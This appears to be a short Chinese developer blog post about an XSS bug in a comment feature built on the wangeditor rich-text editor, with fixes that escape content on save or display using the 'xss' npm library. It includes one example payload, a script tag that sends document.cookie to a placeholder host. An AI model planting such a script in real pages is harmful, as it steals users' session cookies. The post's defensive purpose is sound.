bug-xss 攻击漏洞问题

XSS 攻击漏洞是什么

XSS(Cross-Site Scripting)攻击:通过在网站上植入恶意脚本来攻击用户

举例说明

在留言板发布评论,评论内容包含恶意脚本:

javascript 复制代码
<script>document.location = "http://xxx.com/getCookie?cookie=" + document.cookie;</script>

当用户看到评论时,就会触发响应,将用户cookie发送到攻击者手中

问题描述

前端使用wangeditor富文本编辑器,正常情况下编辑器都会把内容进行转码处理,转码之后就回避xss问题,这次的问题是通过一些手段提及内容(比如postman),这样提交的代码就没有经过编辑器进行转码,读取数据时就会触发恶意代码。

解决方法

  1. 方法一:后端拿到数据后,再进行一次转码,保障进入数据库的内容是转码后的;
  2. 方法二:读取后端数据后,对要展示的数据再进行一次转码,相当于保存和读取都进行转码。

转码工具

https://jsxss.com/zh/index.html

javascript 复制代码
// 安装
npm i xss
// 引用
import filterXSS from 'xss'
const newStr=filterXSS(htmlStr); // 进行转码
相关推荐
不好听6131 小时前
BFF 架构实战:从前端直调 API 到加入中间层
前端·架构
不好听6131 小时前
前端跨域完全指南:从为什么报错到三种解决方案
前端
三8441 小时前
路由策略/控制 配置双点双向路由重发布
服务器·前端·javascript
Qimooidea2 小时前
祁木 CAD Translator 工程图纸出海实战指南
服务器·前端·安全
小林ixn2 小时前
从BFF到SSE:我在Vue项目里藏了个“AI翻译官”
前端·vue.js·vite
元气少女小圆丶3 小时前
unity发布web嵌入到前端页面的接受参数
前端·unity·webgl
工业HMI实战笔记3 小时前
【拯救HMI】:低碳制造:自动化技术如何助力企业节能降耗
运维·前端·自动化·交互·制造
不简说5 小时前
JS 代码技巧 vol.4 — 10 个异步并发控制,Promise.all 这帮兄弟的踩坑实录
前端·javascript·面试
Sinclair5 小时前
安企CMS的安装-PHPStudy(小皮面板)部署
前端·后端
会飞的特洛伊5 小时前
IAM身份认证
前端·后端